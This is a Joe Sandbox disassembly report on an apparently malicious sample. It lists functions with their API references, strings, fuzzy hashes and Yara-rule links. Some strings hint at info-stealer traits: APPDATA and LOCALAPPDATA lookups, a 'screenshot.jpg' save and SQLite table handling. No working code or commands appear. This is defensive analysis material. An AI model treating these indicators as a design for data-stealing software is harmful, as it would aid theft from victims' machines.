Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Gdip$AllocCloneExceptionException@8ImageRaiseThrownumpunct
String ID:
API String ID: 2212125544-0
Opcode ID: 74023a225afb9dcbd0f5171fd2f9f51c375b65ea7774a1cc57ef0d4733aeed77
Instruction ID: 6b11757bca61b10a653a7207f2fb71d454ad58eba317661e52bfc33ccd16beaf
Opcode Fuzzy Hash: 74023a225afb9dcbd0f5171fd2f9f51c375b65ea7774a1cc57ef0d4733aeed77
Instruction Fuzzy Hash: EBF0B4B0400209EFDB109F52DD42AAE77ECEF04306F20806EAC0567262DB78EE08C658

Uniqueness

Uniqueness Score: -1.00%

Function 0043AB9D Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 421COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0043AE14

Strings

:memory:, xrefs: 0043ABE3
BINARY, xrefs: 0043ABB6

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memset
String ID: :memory:$BINARY
API String ID: 2102423945-667466550
Opcode ID: cadcd2f0ee3a0a30ca85763b08c7cc6104fd7e14a803e9a74a4a7b8ff803e26d
Instruction ID: 9fbe4fe93269d2b3667248d8aafc07d796990f38725717491e50c900fee83a81
Opcode Fuzzy Hash: cadcd2f0ee3a0a30ca85763b08c7cc6104fd7e14a803e9a74a4a7b8ff803e26d
Instruction Fuzzy Hash: 27F1CC70944205DFDB25CF24C845BAEBBF1AF18314F24906FE895AB352D738D990CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040A319 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 304COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040A365
_memset.LIBCMT ref: 0040A5E2

Strings

@dG, xrefs: 0040A3DB, 0040A4D9, 0040A562

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memset
String ID: @dG
API String ID: 2102423945-1727147586
Opcode ID: fd9a1a65a7587713ea34f1fef1febac5af73e7d424b19bbe34ff6b9320290261
Instruction ID: 1248fe2d8499a7bcc78ca8f747e6eb2dc0ccb0d41f1cdad7f3e9c8770881aaf6
Opcode Fuzzy Hash: fd9a1a65a7587713ea34f1fef1febac5af73e7d424b19bbe34ff6b9320290261
Instruction Fuzzy Hash: 0AB1E5329002598FCB15CFB8C8985EEBBF5EF46304F18426AD885EB346DB359909CB45

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC9A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

, xrefs: 0040BE18

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: ae9d2c9c9d5d0c484a13b401ec244d14dbc3fb102b7fb41ab7adeb22b1b5e89d
Instruction ID: de79f391009f40025f5fa40d0611f895fc0d200b64f6d2834f2ff09a37a2f05f
Opcode Fuzzy Hash: ae9d2c9c9d5d0c484a13b401ec244d14dbc3fb102b7fb41ab7adeb22b1b5e89d
Instruction Fuzzy Hash: E4518E31900209DFCF25DBA8C8819EEB7B5EF54314B24852FE612B7391DB38A944CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00424107 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00424248

Strings

\\G, xrefs: 0042416D
CREATE TABLE , xrefs: 004241B9

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: CREATE TABLE $\\G
API String ID: 4104443479-4051604877
Opcode ID: 18fcab8dbd71e508bd490ecfd94ffaa665d51578b44c7c98315fc1ca61f183a7
Instruction ID: f1438bac06e3205e03c6b9acb5de528e39d298a725a459d845103f47b4306013
Opcode Fuzzy Hash: 18fcab8dbd71e508bd490ecfd94ffaa665d51578b44c7c98315fc1ca61f183a7
Instruction Fuzzy Hash: CA519071D00129DFCF10CF99D885AEFBBB4EF94308F61809BE455EB201E7389A458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF14 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040EF1E
__wgetenv.LIBCMT ref: 0040EF40

Part of subcall function 00407CC6: std::_Xinvalid_argument.LIBCPMT ref: 00407CDD
Part of subcall function 00407CC6: std::_Xinvalid_argument.LIBCPMT ref: 00407CFF
Part of subcall function 00407CC6: _memmove.LIBCMT ref: 00407D43

Part of subcall function 00401FF9: _memmove.LIBCMT ref: 0040201B

Part of subcall function 0040E31D: __EH_prolog3.LIBCMT ref: 0040E324

Part of subcall function 0040C3DF: __EH_prolog3.LIBCMT ref: 0040C3E6

Part of subcall function 0040BB0D: __EH_prolog3_catch.LIBCMT ref: 0040BB14

Part of subcall function 0040D821: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040D833

Part of subcall function 0040E469: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040E47B

Strings

LOCALAPPDATA, xrefs: 0040EF35

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: H_prolog3Ios_base_dtorXinvalid_argument_memmovestd::_std::ios_base::_$H_prolog3_H_prolog3_catch__wgetenv
String ID: LOCALAPPDATA
API String ID: 741886315-2778322248
Opcode ID: 0a6a4b126a74ef37a6690ea764a2c3234987c925abd6ecb567f599f5c5d39f59
Instruction ID: b94ca8762e66ac3d9056f66a648911bcb81098b92549ba2eee89adc7847f6614
Opcode Fuzzy Hash: 0a6a4b126a74ef37a6690ea764a2c3234987c925abd6ecb567f599f5c5d39f59
Instruction Fuzzy Hash: 18418271801259AEDB10EBA5DC91FDEB778AF15308F1080AEF809731D2DA785F48DAA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040F06C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040F076
__wgetenv.LIBCMT ref: 0040F098

Part of subcall function 00407CC6: std::_Xinvalid_argument.LIBCPMT ref: 00407CDD
Part of subcall function 00407CC6: std::_Xinvalid_argument.LIBCPMT ref: 00407CFF
Part of subcall function 00407CC6: _memmove.LIBCMT ref: 00407D43

Part of subcall function 00401FF9: _memmove.LIBCMT ref: 0040201B

Part of subcall function 0040E31D: __EH_prolog3.LIBCMT ref: 0040E324

Part of subcall function 0040C3DF: __EH_prolog3.LIBCMT ref: 0040C3E6

Part of subcall function 0040BB0D: __EH_prolog3_catch.LIBCMT ref: 0040BB14

Part of subcall function 0040D821: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040D833

Part of subcall function 0040E469: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040E47B

Strings

APPDATA, xrefs: 0040F08D

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: H_prolog3Ios_base_dtorXinvalid_argument_memmovestd::_std::ios_base::_$H_prolog3_H_prolog3_catch__wgetenv
String ID: APPDATA
API String ID: 741886315-4054820676
Opcode ID: 07c357a2601122a573c5e5c2ef2ac5b241e385ae857266b1989fa9f5d1b45a77
Instruction ID: 2b0b3090723ec70d77a02f790ce9f8a6d175df7780a4f6ddcd38d2a68fd5d0ef
Opcode Fuzzy Hash: 07c357a2601122a573c5e5c2ef2ac5b241e385ae857266b1989fa9f5d1b45a77
Instruction Fuzzy Hash: 95418271801259AEDB10EBA5DC91FDEB77CAF15308F1080AEF809731D2DA785F48DAA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414AA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00414A20: __allrem.LIBCMT ref: 00414A49

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414B2E
__localtime64_s.LIBCMT ref: 00414B49

Strings

utc, xrefs: 00414ABA

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__localtime64_s
String ID: utc
API String ID: 1840914312-848560057
Opcode ID: 87af3135471e67276915991a52116c3b459e8e4e6caf5be3a62db7e628218340
Instruction ID: 3fdda898334a8bd4cd2da9152f78d1e8a9562413f4017a571d82f45f5f936c5d
Opcode Fuzzy Hash: 87af3135471e67276915991a52116c3b459e8e4e6caf5be3a62db7e628218340
Instruction Fuzzy Hash: 543102B290020DDFCB04DF69D882ADE3BB4FF48354F01412AFD15A3241DB78E9998B88

Uniqueness

Uniqueness Score: -1.00%

Function 0040132D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00401347

Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571CE
Part of subcall function 004571B9: __CxxThrowException@8.LIBCMT ref: 004571E3
Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571F4

Part of subcall function 004012CB: std::_Xinvalid_argument.LIBCPMT ref: 004012DA

_memmove.LIBCMT ref: 004013A2

Strings

invalid string position, xrefs: 00401342

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: f1e3a160d106082a7f03e26f5b86d3f03c12e94bd7d2ce0d3572e8813adc620b
Instruction ID: efa058f24cc8adac38c4a71e0d60875b26bd198e78c6e2a97c79199945dfae91
Opcode Fuzzy Hash: f1e3a160d106082a7f03e26f5b86d3f03c12e94bd7d2ce0d3572e8813adc620b
Instruction Fuzzy Hash: 47110D31304210DBEB249E199C81E2EB3A5EB95714B10053FFD16AB7E2D778D801879D

Uniqueness

Uniqueness Score: -1.00%

Function 00403712 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00403757
_memmove.LIBCMT ref: 00403788

Strings

string too long, xrefs: 00403752

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: 55af327f1f85cb13711ac0a2c0da3e3a8367107dea7f87aaffde1a0a923614bc
Instruction ID: 3a22d8e648ac8fca71cfad8a1e95e131d7f0dcda3d00c3e3cbbb7072fb8fa089
Opcode Fuzzy Hash: 55af327f1f85cb13711ac0a2c0da3e3a8367107dea7f87aaffde1a0a923614bc
Instruction Fuzzy Hash: 2811C8B53047009BD6349E2D9940A27BBEDEF81715B104E3FF482A72D1C7799D05875A

Uniqueness

Uniqueness Score: -1.00%

Function 00402193 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004021AD

Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571CE
Part of subcall function 004571B9: __CxxThrowException@8.LIBCMT ref: 004571E3
Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571F4

Part of subcall function 0040212C: std::_Xinvalid_argument.LIBCPMT ref: 0040213E

_memmove.LIBCMT ref: 0040220A

Strings

invalid string position, xrefs: 004021A8

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position
API String ID: 3404309857-1799206989
Opcode ID: a20616a6885968436db103c5bb2f58cb6c76f718a787c319280018d6f286854f
Instruction ID: b2981b4e5612f3c641bd2e866b190b74a7c2127fb9dc879c5446cf2fe4964fd7
Opcode Fuzzy Hash: a20616a6885968436db103c5bb2f58cb6c76f718a787c319280018d6f286854f
Instruction Fuzzy Hash: EE110231304111ABCB149E49DD88E6A336ABB96325B04013FFD15AB2C2DBB8AC14D6A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB96 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0040FB9D
std::_Xinvalid_argument.LIBCPMT ref: 0040FBB4

Part of subcall function 0045716C: std::exception::exception.LIBCMT ref: 00457181
Part of subcall function 0045716C: __CxxThrowException@8.LIBCMT ref: 00457196
Part of subcall function 0045716C: std::exception::exception.LIBCMT ref: 004571A7

Strings

vector<T> too long, xrefs: 0040FBAF

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8H_prolog3_catchThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1877048013-3788999226
Opcode ID: 1af768774b386ec80f7fe45a6398408c3677903a000167af1b103fa0b7528c69
Instruction ID: bc33ef5a650d5c4d0b94aafd0fb8099084f1aff2e4efb2affb654f3cbb27163a
Opcode Fuzzy Hash: 1af768774b386ec80f7fe45a6398408c3677903a000167af1b103fa0b7528c69
Instruction Fuzzy Hash: F51108766003049FD724EF69C882E05B7E5EF44300F10883EF9899B691D675E9448B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040FC4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0040FC51
std::_Xinvalid_argument.LIBCPMT ref: 0040FC68

Part of subcall function 0045716C: std::exception::exception.LIBCMT ref: 00457181
Part of subcall function 0045716C: __CxxThrowException@8.LIBCMT ref: 00457196
Part of subcall function 0045716C: std::exception::exception.LIBCMT ref: 004571A7

Strings

vector<T> too long, xrefs: 0040FC63

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8H_prolog3_catchThrowXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1877048013-3788999226
Opcode ID: 1f4abba24d4ab096c0f8d5dfa9c4847b27fd318e2750a1de3dcb7b0136dd0fcc
Instruction ID: 6ea970cc7ac72f69cb1cac4f4c3a4e02ea6ba3aa66d99bc2ad16657bf71aefe2
Opcode Fuzzy Hash: 1f4abba24d4ab096c0f8d5dfa9c4847b27fd318e2750a1de3dcb7b0136dd0fcc
Instruction Fuzzy Hash: B8113A766007049FD724EF29C9C2E4AB7E9AF44304F10883FF989DB691DA75E944CB68

Uniqueness

Uniqueness Score: -1.00%

Function 00407D5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00407DA2
_memmove.LIBCMT ref: 00407DD8

Strings

string too long, xrefs: 00407D9D

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: b413939fa1a9b2753585c55f00f820c82d04ff23ca2176797e19d26647144268
Instruction ID: 2a6e852577f6010bb57ad2f81334ed4f101b7846cdbc33b72c17dd571096bd35
Opcode Fuzzy Hash: b413939fa1a9b2753585c55f00f820c82d04ff23ca2176797e19d26647144268
Instruction Fuzzy Hash: 8E1106317086019BC620EE6D9C54D7FB7A9AF81714710092FF442A32D1DB38B809C66B

Uniqueness

Uniqueness Score: -1.00%

Function 0040111F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00401132

Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571CE
Part of subcall function 004571B9: __CxxThrowException@8.LIBCMT ref: 004571E3
Part of subcall function 004571B9: std::exception::exception.LIBCMT ref: 004571F4

_memmove.LIBCMT ref: 0040116D

Strings

invalid string position, xrefs: 0040112D

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: ee0ba88b26d79292e9a21baf1346e73e320a1e607f89658c81a1c17b8c887034
Instruction ID: 6cb59bf8f525b9e5bade3c37c056a3f8da555ebb92b94b1d6f59da4251819a35
Opcode Fuzzy Hash: ee0ba88b26d79292e9a21baf1346e73e320a1e607f89658c81a1c17b8c887034
Instruction Fuzzy Hash: 2C01D8313002018BD3288D2CDD8482BB3E6EB897007204D3ED586DF795CB78EC4A87A8

Uniqueness

Uniqueness Score: -1.00%

Function 0045E0F7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00458A7F: __getptd.LIBCMT ref: 00458A85
Part of subcall function 00458A7F: __getptd.LIBCMT ref: 00458A95

__getptd.LIBCMT ref: 0045E106

Part of subcall function 0045EE42: __getptd_noexit.LIBCMT ref: 0045EE45
Part of subcall function 0045EE42: __amsg_exit.LIBCMT ref: 0045EE52

__getptd.LIBCMT ref: 0045E114

Strings

csm, xrefs: 0045E122

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: csm
API String ID: 803148776-1018135373
Opcode ID: e18393088472aa0d62c4883d5aed07f5dc139875811dc7a44c05ef30147cc47a
Instruction ID: dc673e1cc31125fe4750e9e7a177419c7d189f9565075e4931df4d5fae1b5001
Opcode Fuzzy Hash: e18393088472aa0d62c4883d5aed07f5dc139875811dc7a44c05ef30147cc47a
Instruction Fuzzy Hash: 9C011634800B05CACF289F62C4456AFB7B5AF15312F58442FEC4196A53CB388E88CA09

Uniqueness

Uniqueness Score: -1.00%

Function 004514CE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004512BE: GdipAlloc.GDIPLUS(00000010,004514EA,?,00000000), ref: 004512C0

Part of subcall function 00451417: GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0045142E

GdipSaveImageToFile.GDIPLUS(?,screenshot.jpg,?,00000000), ref: 0045150B

Strings

image/jpeg, xrefs: 004514F0
screenshot.jpg, xrefs: 00451503

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Gdip$Image$AllocEncodersFileSaveSize
String ID: image/jpeg$screenshot.jpg
API String ID: 2572949680-3715547155
Opcode ID: 436604a6d678e2e5789754787a89c9699682cdeb28a18bc8b8e28758b07a387d
Instruction ID: 662939ab84b7df4d2976dc76652313a82f46ab197d2fdf5d9d3987c3f488da2e
Opcode Fuzzy Hash: 436604a6d678e2e5789754787a89c9699682cdeb28a18bc8b8e28758b07a387d
Instruction Fuzzy Hash: 6DF09671600604AFD710FBA5CD02FAF77E89F08705F10446AFD06E7292DE64EE048799

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 0040A707
__CxxThrowException@8.LIBCMT ref: 0040A71C

Part of subcall function 00458681: _malloc.LIBCMT ref: 0045869B

Strings

CG, xrefs: 0040A715

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: CG
API String ID: 4063778783-3621608553
Opcode ID: 81bdc0fe794eb2ab29fcc0a85616a9ebf8a4581fc0b7fd13547e107bb62d211e
Instruction ID: cd92fa44e5c45a1c32e9cf71ec36f0f447eb0ae0b010e03033f6e634b15f9c16
Opcode Fuzzy Hash: 81bdc0fe794eb2ab29fcc0a85616a9ebf8a4581fc0b7fd13547e107bb62d211e
Instruction Fuzzy Hash: 66E0E53491030966CB08FAA6C4916AF77AC5B00749F10812FE805E2182DF38D6488B99

Uniqueness

Uniqueness Score: -1.00%

Function 00401EED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 00401F1D
__CxxThrowException@8.LIBCMT ref: 00401F32

Part of subcall function 00458681: _malloc.LIBCMT ref: 0045869B

Strings

CG, xrefs: 00401F2B

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.317277399.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317352104.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.317366878.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_555.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: CG
API String ID: 4063778783-3621608553
Opcode ID: 93668cadfaac1b42c31d9b3f695179cbce7eb0cec4776eb80149690458dc99a2
Instruction ID: 8863bf62f11b9e4ae0c1e74ab7e3802ffa60bc787b0383fac6db5ec65acc136b
Opcode Fuzzy Hash: 93668cadfaac1b42c31d9b3f695179cbce7eb0cec4776eb80149690458dc99a2
Instruction Fuzzy Hash: 33E0657191030AAACB14FAA5D4919DE73EC5F0575DF20827FE815E11D1DF78DA088B58

Uniqueness

Uniqueness Score: -1.00%

Function 004010C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 004010EB
__CxxThrowException@8.LIBCMT ref: 00401100

Part of subcall function 00458681: _malloc.LIBCMT ref: 0045869B

Strings

CG, xrefs: 004010F9

Memory Dump Source

Source File: 00000003.00000002.317282785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

